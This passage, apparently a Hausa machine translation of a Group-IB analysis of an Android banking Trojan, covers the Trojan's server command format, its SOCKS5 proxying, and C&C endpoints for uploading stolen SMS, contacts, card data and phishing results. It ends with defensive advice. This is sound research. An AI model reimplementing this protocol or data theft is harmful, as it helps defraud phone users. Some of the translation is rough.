- sigar - ana adana wannan filin a cikin aji na daidaitawa; don nau'ikan bot ɗin da aka gwada daidai yake da "1.6".
5. Yana canzawa zuwa yanayin jiran umarni daga uwar garken. Umarni daga uwar garken suna zuwa a cikin tsari:
- 0 biya diyya - umarni
- 1 biya diyya - sessionId
- 2 biya diyya - tsayi
- 4-bayyani - data
Lokacin da umarni ya zo, aikace-aikacen yana yin rajista:
mainLog(" Header { sessionId<%id%>], rubuta[<% umarni%>], tsayi[<%length%>] })
Umarni masu zuwa daga uwar garken suna yiwuwa:
| sunan | umurnin | data | description |
|---|---|---|---|
| haɗiId | 0 | ID na haɗi | Ƙirƙiri sabon haɗi |
| SLEEP | 3 | Time | Dakatar da tsarin wakili |
| PING_PONG | 4 | - | Aika sakon PONG |
Saƙon PONG ya ƙunshi bytes 4 kuma yayi kama da haka: 0x04000000.
Lokacin da aka karɓi umarnin haɗiId (don ƙirƙirar sabon haɗi) Command Connection yana haifar da misali na aji ProxyConnection.
- Ajujuwa biyu suna shiga cikin wakili: ProxyConnection и karshen. Lokacin ƙirƙirar aji ProxyConnection haɗi zuwa adireshin ProxyConfigClass.host: ProxyConfigClass.proxyPort da wuce abin JSON:
{
"id":<%connectionId%>
}Don amsawa, uwar garken tana aika saƙon SOCKS5 wanda ya ƙunshi adireshin sabar nesa wanda dole ne a kafa haɗin kai da shi. Yin hulɗa tare da wannan uwar garken yana faruwa ta cikin aji karshen. Ana iya wakilta saitin haɗin kai da tsari kamar haka:
Hanyoyin sadarwa
Don hana binciken zirga-zirga ta hanyar masu satar hanyar sadarwa, ana iya kiyaye hulɗar tsakanin uwar garken CnC da aikace-aikacen ta amfani da ka'idar SSL. Duk bayanan da aka watsa duka daga kuma zuwa uwar garken ana gabatar dasu a cikin tsarin JSON. Aikace-aikacen yana aiwatar da buƙatun masu zuwa yayin aiki:
- http://<%CnC%>/api/v1/set_state.php - sakamakon aiwatar da umarnin.
- http://<%CnC%>/api/v1/get.php - karbar umarni.
- http://<%CnC%>/api/v1/load_sms.php - zazzage saƙon SMS daga na'urar da ta kamu da cutar.
- http://<%CnC%>/api/v1/load_ab.php - loda jerin lambobin sadarwa daga na'urar da ta kamu da cutar.
- http://<%CnC%>/api/v1/aevents.php - Ana buƙatar buƙatar lokacin sabunta sigogi da ke cikin fayil ɗin fifiko.
- http://<%CnC%>/api/v1/set_card.php - loda bayanan da aka samu ta hanyar amfani da taga mai ɓoye kamar Google Play Market.
- http://<%CnC%>/api/v1/logs.php - loda bayanan log.
- http://<%CnC%>/api/v1/records.php - loda bayanan da aka samu ta windows phishing.
- http://<%CnC%>/api/v1/set_error.php - sanarwar kuskuren da ya faru.
shawarwari
Don kare abokan cinikin su daga barazanar Trojans na wayar hannu, dole ne kamfanoni suyi amfani da cikakkun hanyoyin magancewa waɗanda ke ba su damar saka idanu da hana ayyukan ƙeta ba tare da shigar da ƙarin software akan na'urorin masu amfani ba.
Don yin wannan, hanyoyin sa hannu don gano Trojans ta hannu suna buƙatar ƙarfafa tare da fasaha don nazarin halayen abokin ciniki da aikace-aikacen kanta. Kariyar kuma yakamata ta haɗa da aikin gano na'urar ta amfani da fasahar hoton yatsa na dijital, wanda zai ba da damar fahimtar lokacin da ake amfani da asusu daga na'urar da ba ta dace ba kuma ta riga ta faɗa hannun ɗan damfara.
Mahimmin mahimmanci shine samar da bincike na tashoshi, wanda ke bawa kamfanoni damar sarrafa haɗarin da ke tasowa ba kawai akan Intanet ba, har ma a kan tashar wayar hannu, alal misali, a cikin aikace-aikacen banki na wayar hannu, don ma'amaloli tare da cryptocurrencies da kowane sauran inda suke. ana iya aiwatar da ma'amaloli.
Dokokin aminci ga masu amfani:
- kar a shigar da aikace-aikacen na'urar hannu tare da Android OS daga kowane tushe banda Google Play, kula da haƙƙin da aikace-aikacen ke buƙata ta musamman;
- shigar da sabuntawar OS na Android akai-akai;
- kula da kari na fayilolin da aka sauke;
- kada ku ziyarci albarkatun da ake tuhuma;
- Kar a danna hanyoyin haɗin da aka karɓa a cikin saƙonnin SMS.
Tauraro Semyon Rogacheva, ƙarami ƙwararre a binciken malware a Rukunin-IB Computer Forensics Laboratory.
source: www.habr.com